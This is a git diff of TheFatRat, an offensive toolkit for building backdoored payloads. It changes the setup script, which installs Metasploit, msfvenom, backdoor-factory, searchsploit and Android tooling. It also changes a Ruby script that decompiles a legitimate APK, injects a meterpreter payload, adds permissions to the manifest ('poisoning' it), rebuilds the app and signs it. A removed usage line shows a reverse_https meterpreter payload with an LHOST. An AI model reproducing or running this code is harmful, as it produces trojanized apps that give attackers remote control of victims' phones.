echo "[ ! ] Installing monodevelop from your apt sources ]" echo "[ ! ] Installing monodevelop from your apt sources ]"
xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y" xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which monodevelop >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -122,12 +144,14 @@ fi
which ruby > /dev/null 2>&1 which ruby > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Ruby .............................[ found ]" echo "[ ✔ ] Ruby .............................[ found ]"
which ruby >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Ruby -> not found ]" echo "[ X ] Ruby -> not found ]"
echo "[ ! ] Installing ruby from your apt sources ]" echo "[ ! ] Installing ruby from your apt sources ]"
xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y" xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which ruby >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -135,12 +159,14 @@ fi
which apache2 > /dev/null 2>&1 which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apache2 ..........................[ found ]" echo "[ ✔ ] Apache2 ..........................[ found ]"
which apache2 >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Apache2 -> not found ]" echo "[ X ] Apache2 -> not found ]"
echo "[ ! ] Installing apache2 from your apt sources ]" echo "[ ! ] Installing apache2 from your apt sources ]"
xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y" xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which apache2 >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -150,12 +176,14 @@ fi
which gnome-terminal > /dev/null 2>&1 which gnome-terminal > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gnome Terminal....................[ found ]" echo "[ ✔ ] Gnome Terminal....................[ found ]"
which gnome-terminal >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Gnome-terminal-> not found ]" echo "[ X ] Gnome-terminal-> not found ]"
echo "[ ! ] Installing gnome-terminal from your apt sources ]" echo "[ ! ] Installing gnome-terminal from your apt sources ]"
xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y" xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which gnome-terminal >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -163,12 +191,95 @@ fi
which upx > /dev/null 2>&1 which upx > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] UPX Compressor....................[ found ]" echo "[ ✔ ] UPX Compressor....................[ found ]"
which upx >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Upx compressor -> not found ]" echo "[ X ] Upx compressor -> not found ]"
echo "[ ! ] Installing upx-compressor from your apt sources ]" echo "[ ! ] Installing upx-compressor from your apt sources ]"
xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y" xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which upx >> $log 2>&1
sleep 2
fi
#Checking if keytool exists
which keytool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Keytool (java)....................[ found ]"
which keytool >> $log 2>&1
sleep 2
else
echo "[ X ] Keytool (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jre default-jdk -y "
echo "[ ✔ ] Done installing ...."
which keytool >> $log 2>&1
sleep 2
fi
#Checking if Jarsigner exists
which jarsigner > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Jarsigner (java)..................[ found ]"
which jarsigner >> $log 2>&1
sleep 2
else
echo "[ X ] Jarsigner (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jdk -y "
echo "[ ✔ ] Done installing ...."
which jarsigner >> $log 2>&1
sleep 2
fi
#Checking if Unzip exists
which unzip > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Unzip.............................[ found ]"
which unzip >> $log 2>&1
sleep 2
else
echo "[ X ] Unzip -> not found ]"
echo "[ ! ] Installing Unzip from your apt sources ]"
xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip -y "
echo "[ ✔ ] Done installing ...."
which unzip >> $log 2>&1
sleep 2
fi
#Checking if Aapt exists
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Aapt..............................[ found ]"
which aapt >> $log 2>&1
sleep 2
else
echo "[ X ] Aapt -> not found ]"
echo "[ ! ] Installing Aapt from your apt sources ]"
xterm -T "☣ INSTALL AAPT ☣" -geometry 100x30 -e "sudo apt-get install aapt -y "
echo "[ ✔ ] Done installing ...."
which aapt >> $log 2>&1
sleep 2
fi
#Installing dependencies for Zipalign
echo "[ ! ] Installing Zipalign dependencies from your apt sources"
xterm -T "☣ INSTALL ZIPALING ☣" -geometry 100x30 -e "sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev -y "
echo "[ ✔ ] Done installing ...."
sleep 2
#Checking if Zipalign exists
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zipalign..........................[ found ]"
which zipalign >> $log 2>&1
sleep 2
else
echo "[ X ] Zipalign -> not found ]"
echo "[ ! ] Installing Zipalign from your apt sources "
xterm -T "☣ INSTALL ZIPALIGN ☣" -geometry 100x30 -e "sudo apt-get install zipalign -y "
echo "[ ✔ ] Done installing ...."
which zipalign >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -193,41 +304,63 @@ echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/s
echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
sleep 2 sleep 2
xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1
#Checking if apktool exists #Checking if apktool exists
which apktool > /dev/null 2>&1 which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apktool...........................[ found ]" echo "[ ✔ ] Apktool...........................[ found ]"
which apktool >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Apktool -> not found ]" echo "[ X ] Apktool -> not found "
echo "[ ! ] Installing apktool from Kali repositories ]" echo "[ ! ] Installing apktool from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y" xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
which apktool >> $log 2>&1
sleep 2 sleep 2
fi fi
#Checking if dex2jar exists
which d2j-jar2dex > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Dex2Jar...........................[ found ]"
which d2j-jar2dex >> $log 2>&1
sleep 2
else
echo "[ X ] Dex2jar -> not found "
echo "[ ! ] Installing dex2jar from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install dex2jar --force-yes -y"
echo "[ ✔ ] Done installing ...."
which d2j-jar2dex >> $log 2>&1
sleep 2
fi
#installing dependencies for ruby script
echo "[ ! ] Installing dedepndencies for ruby script from Kali repositories "
xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y"
echo "[ ✔ ] Done installing ...."
sleep 2
# check if metasploit-framework its installed # check if metasploit-framework its installed
which msfconsole > /dev/null 2>&1 which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Metasploit-Framework..............[ found ]" echo "[ ✔ ] Metasploit-Framework..............[ found ]"
# msf was detected , removing config file in case setup was already configured before # msf was detected , removing config file in case setup was already configured before
rm -f config.path rm -f $config
#Creating new config file based on last detection of msf #Creating new config file based on last detection of msf
touch config.path touch $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "msfconsole" >> config.path echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" >> config.path echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
else else
echo "" echo ""
echo "[ X ] metasploit-framework -> not found ]" echo "[ X ] metasploit-framework -> not found "
# Providing manual input to user in case metasploit was installed from git and is not on system path # Providing manual input to user in case metasploit was installed from git and is not on system path
echo "" echo ""
@ -237,39 +370,39 @@ read -p "Press Y/y to config metasploit-framework path or N/n to install it from
case "$choice" in case "$choice" in
y|Y) y|Y)
rm -f config.path rm -f $config
touch config.path touch $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
clear clear
echo "Enter the path of your Metasploit Instalation or just press enter for default config ." echo -e $white "Enter the path of your Metasploit Instalation or just press enter for default config :
echo -e $white "Ex:(/opt/metasploit-framework)"; ex:(/opt/metasploit-framework)";
read -p "Path:" msfc read -p "Path: " msfc
if [[ -z "$msfc" ]]; then if [[ -z "$msfc" ]]; then
echo "msfconsole" >> config.path echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" >> config.path echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
else else
echo "ruby $msfc/msfconsole" >> config.path echo "ruby $msfc/msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "ruby $msfc/msfvenom" >> config.path echo "ruby $msfc/msfvenom" | tee -a $config $log > /dev/null 2>&1
fi fi
;; ;;
n|N) n|N)
echo "[ ! ] Installing metasploit-framework from kali repositories ]" echo "[ ! ] Installing metasploit-framework from kali repositories "
xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
rm -f config.path rm -f $config
touch config.path touch $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config
echo "********************************************************************************************************" >> config.path echo "********************************************************************************************************" >> $config
# adding the msf startups automatically to config file # adding the msf startups automatically to config file
echo "msfconsole" >> config.path echo "msfconsole" | tee -a $config $log > /dev/null 2>&1
echo "msfvenom" >> config.path echo "msfvenom" | tee -a $config $log > /dev/null 2>&1
;; ;;
*) *)
@ -282,25 +415,24 @@ fi
which backdoor-factory > /dev/null 2>&1 which backdoor-factory > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Backdoor-Factory..................[ found ]" echo "[ ✔ ] Backdoor-Factory..................[ found ]"
echo "backdoor-factory" >> config.path echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
else else
echo "[ X ] backdoor-factory -> not found ]" echo "[ X ] backdoor-factory -> not found "
echo "" echo ""
echo -e $white "[This script requires backdoor-factory echo -e $white "[This script requires backdoor-factory , do you want to setup its path manually ?]";
, do you want to setup its path manually ?]";
read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1 read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1
case "$choice1" in case "$choice1" in
y|Y ) y|Y )
clear clear
echo -e $white "Enter the path for backdoor.py ex:(/opt/backdoor-factory/backdoor.py) echo -e $white "Enter the path for backdoor.py , or just press [ENTER] for default config :
, or just press [ENTER] for default config : "; ex:(/opt/backdoor-factory/backdoor.py)";
read -p "Path:" backdoor read -p "Path: " backdoor
if [[ -z "$backdoor" ]]; then if [[ -z "$backdoor" ]]; then
echo "backdoor-factory" >> config.path echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
else else
echo "python2 $backdoor" >> config.path echo "python2 $backdoor" | tee -a $config $log > /dev/null 2>&1
fi fi
;; ;;
@ -308,7 +440,7 @@ fi
echo "[ ! ] Installing backdoor-factory from kali repositories ]" echo "[ ! ] Installing backdoor-factory from kali repositories ]"
xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
echo "backdoor-factory" >> config.path echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1
;; ;;
*) *)
@ -316,13 +448,12 @@ echo "Invalid Input (Choose y/Y or n/N only)"
;; ;;
esac; esac;
fi fi
sleep 2
# check if searchsploit exists # check if searchsploit exists
which searchsploit > /dev/null 2>&1 which searchsploit > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Searchsploit......................[ found ]" echo "[ ✔ ] Searchsploit......................[ found ]"
echo "searchsploit" >> config.path echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
else else
echo "[ X ] searchsploit -> not found]" echo "[ X ] searchsploit -> not found]"
@ -333,13 +464,13 @@ case "$choice2" in
y|Y ) y|Y )
clear clear
echo -e $yellow "Enter the path for searchsploit ex:(/opt/searchsploit/searchsploit) echo -e $white "Enter the path for searchsploit , or just press [ENTER] for default config :
, or just press [ENTER] for default config : " ex:(/opt/searchsploit/searchsploit) "
read -p "Path: " searchsploit read -p "Path: " searchsploit
if [[ -z "$searchsploit" ]]; then if [[ -z "$searchsploit" ]]; then
echo "searchsploit" >> config.path echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
else else
echo "bash $searchsploit" >> config.path echo "bash $searchsploit" | tee -a $config $log > /dev/null 2>&1
fi fi
;; ;;
@ -347,7 +478,7 @@ n|N )
echo "[ ! ] Installing searchsploit from kali repositories ]" echo "[ ! ] Installing searchsploit from kali repositories ]"
xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y"
echo "[ ✔ ] Done installing ...." echo "[ ✔ ] Done installing ...."
echo "searchsploit" >> config.path echo "searchsploit" | tee -a $config $log > /dev/null 2>&1
sleep 2 sleep 2
echo "" echo ""
echo "Configuration and tool installed with success!"; echo "Configuration and tool installed with success!";
@ -383,7 +514,7 @@ rm -f /usr/local/sbin/fatrat
touch /usr/local/sbin/fatrat touch /usr/local/sbin/fatrat
echo "#!/bin/bash" > /usr/local/sbin/fatrat echo "#!/bin/bash" > /usr/local/sbin/fatrat
echo $scrp >> /usr/local/sbin/fatrat echo $scrp >> /usr/local/sbin/fatrat
chmod +x /usr/local/sbin/fatrat chmod +x /usr/local/sbin/fatrat
clear clear
echo ""; echo "";
echo "[ ]====================================================================[ ]"; echo "[ ]====================================================================[ ]";
@ -391,6 +522,7 @@ echo "";
echo "[ ]====================================================================[ ]"; echo "[ ]====================================================================[ ]";
echo ""; echo "";
chmod +x fatrat chmod +x fatrat
which fatrat >> $log 2>&1
sleep 2 sleep 2
;; ;;

31
tools/apkembed.rb
View file

@ -89,8 +89,8 @@ def fix_manifest()
} }
original_permissions=[] original_permissions=[]
apk_mani='' apk_mani=''
#Load original apk's permissions #Load original apk's permissions
File.open("output/original/AndroidManifest.xml","r"){|file2| File.open("output/original/AndroidManifest.xml","r"){|file2|
k=File.read(file2) k=File.read(file2)
apk_mani=k apk_mani=k
@ -152,29 +152,6 @@ unless(apk_v.split()[1].include?("v2."))
exit(1) exit(1)
end end
begin
msfvenom_opts = ARGV[1,ARGV.length]
opts=""
msfvenom_opts.each{|x|
opts+=x
opts+=" "
}
rescue
puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
puts "[-] Error parsing msfvenom options. Exiting.\n"
exit(1)
end
print "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o output/payload.apk `
if res.downcase.include?("invalid" || "error")
puts res
exit(1)
end
print "[*] Signing payload..\n" print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey` `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey`
@ -183,7 +160,7 @@ print "[*] Signing payload..\n"
`cp #{apkfile} output/original.apk` `cp #{apkfile} output/original.apk`
print "[*] Decompiling orignal APK..\n" print "[*] Decompiling original APK..\n"
`apktool d output/original.apk -o output/original` `apktool d output/original.apk -o output/original`
print "[*] Decompiling payload APK..\n" print "[*] Decompiling payload APK..\n"
`apktool d output/payload.apk -o output/payload` `apktool d output/payload.apk -o output/payload`
@ -226,7 +203,7 @@ print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest() fix_manifest()
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o output/#{injected_apk} output/original` `apktool b -o #{injected_apk} output/original`
print "[*] Signing #{injected_apk} ..\n" print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`